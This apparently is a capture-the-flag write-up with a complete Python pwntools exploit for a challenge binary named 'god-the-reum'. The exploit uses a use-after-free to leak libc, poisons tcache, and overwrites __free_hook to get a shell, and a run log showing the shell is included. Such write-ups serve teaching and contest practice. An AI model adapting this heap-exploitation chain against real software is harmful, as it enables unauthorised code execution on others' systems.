Category : pwnable


Summary : use-after-free (a withdrawn wallet is freed but stays listed and writable), libc leak read back from a freed chunk, tcache poisoning, __free_hook overwritten with a one-gadget




Exploit

#!/usr/bin/python

from pwn import *

def cmd_create(amount):
    """Menu option 1: create a new wallet.

    Waits for the menu prompt, picks option 1, then answers the follow-up
    prompt with ``amount`` as a decimal string.  Uses the module-level
    ``ru``/``sl`` aliases bound to the pwntools tube.
    """
    ru(': ')
    sl('1')
    ru(': ')
    sl('{}'.format(amount))

def cmd_deposit(wallet_no, amount):
    """Menu option 2: deposit ``amount`` into wallet ``wallet_no``.

    Every value is sent as its decimal string after the corresponding
    ``': '`` prompt.  Not used by the exploit chain below; kept as part of
    the menu wrapper set.
    """
    answers = ('2', wallet_no, amount)
    for answer in answers:
        ru(': ')
        sl('{}'.format(answer))

def cmd_withdraw(wallet_no, amount):
    """Menu option 3: withdraw ``amount`` from wallet ``wallet_no``.

    In this binary a withdrawal frees the wallet's chunk (see the
    ``# free`` markers in the exploit chain) while the wallet remains
    listed, which is the use-after-free the exploit relies on.
    """
    answers = ('3', wallet_no, amount)
    for answer in answers:
        ru(': ')
        sl('{}'.format(answer))

def cmd_show():
    """Menu option 4: list wallets and return their balances as ints.

    Skips the list header, then reads one line per wallet until an empty
    line, taking the integer after the literal ``'ballance '`` (the
    binary's own spelling).  Freed wallets are still listed, so the
    "balance" of a freed chunk is whatever the allocator left in its
    first qword -- that is how the libc pointer is leaked.

    NOTE(review): the loop stops on ``''`` and assumes the Python 2
    pwntools API where ``recvline`` returns ``str``; under Python 3 it
    returns ``bytes`` and the blank line would never match.  A line
    without ``'ballance '`` raises ``IndexError``.
    """
    ru(': ')
    sl('4')
    ru('========== My Wallet List =============\n')
    balances = []
    line = rl(False)
    while line != '':
        _, after_label = line.split('ballance ', 1)[0], line.split('ballance ')[1]
        balances.append(int(after_label))
        line = rl(False)
    return balances

def cmd_new_eth(wallet_no, new_eth):
    """Menu option 6: write ``new_eth`` into wallet ``wallet_no``.

    ``new_eth`` is sent verbatim (no ``str()``), so callers pass the raw
    bytes they want stored -- the exploit passes ``p64(...)`` to overwrite
    the first qword of a freed chunk.  Writing into a freed wallet is the
    write half of the use-after-free.
    """
    ru(': ')
    sl('6')
    ru(': ')
    sl('{}'.format(wallet_no))
    ru(': ')
    sl(new_eth)

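# --- target setup ----------------------------------------------------------
# Local binary by default; the remote line is kept for the live target.
# Every libc offset below was taken from the libc the author tested against
# and must be re-derived (main_arena, __free_hook, one_gadget) for any other
# build before pointing this at a different target.
s = process('./god-the-reum')
#s = remote('110.10.147.103', 10001)
ru = s.recvuntil
rl = s.recvline
rr = s.recv
sl = s.sendline
ss = s.send

# --- step 1: libc leak through the use-after-free --------------------------
# Wallet 0 is large (presumably beyond the tcache size limit, so its freed
# chunk carries an arena pointer); wallet 1 is small and is freed into
# tcache.  Withdrawing frees the wallet, but "show" still lists it, so the
# balance field of wallet 0 reads back the freed chunk's first qword.
cmd_create(0x420) # 0
cmd_create(0x50) # 1

cmd_withdraw(0, 0x420) # free
cmd_withdraw(1, 0x50) # free

libc_leak, _ = cmd_show()
libc_base = libc_leak - 0x3ebca0          # leak == main_arena+96 on the tested libc
malloc_hook = libc_base + 0x3ebc30        # unused by this chain; kept for reference
free_hook = libc_base + 0x3ed8e8
libc_one_gadget = libc_base + 0xe569f     # one_gadget from the tested libc; constraints not re-checked here

# Sanity-check the leak before poisoning tcache: libc is mapped page-aligned,
# so a base with low bits set means the parsed value or the offset is wrong,
# and the writes below would only corrupt the heap.
log.info('libc leak %#x -> base %#x' % (libc_leak, libc_base))
if libc_base & 0xfff:
    s.close()
    raise SystemExit('libc base %#x is not page-aligned; check the leak parsing and libc offsets' % libc_base)

# --- step 2: tcache poisoning ----------------------------------------------
# Wallet 1 is freed but still writable: its first qword is the tcache
# "next" pointer of the 0x60 bin, so this points that bin at __free_hook
# (the gdb line below shows the poisoned entry).
cmd_new_eth(1, p64(free_hook))
# (0x60) tcache_entry[4]: 0x5623649f77b0 --> 0x7f51275e38e8

# Two same-size allocations: wallet 2 takes the old wallet-1 chunk, wallet 3
# takes the poisoned entry, i.e. it is backed by memory at __free_hook.
cmd_create(0x50) # 2
cmd_create(0x50) # 3

# --- step 3: __free_hook -> one_gadget, then trigger a free() --------------
cmd_new_eth(3, p64(libc_one_gadget))
cmd_withdraw(2, 0x50)    # free(wallet 2) now goes through __free_hook
ru('withdraw? : ')

s.interactive()
s.close()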


$ python exploit.py
[+] Starting local process './god-the-reum': pid 2779
[*] Switching to interactive mode
$ id

uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)


WRITTEN BY
pwn3r_45
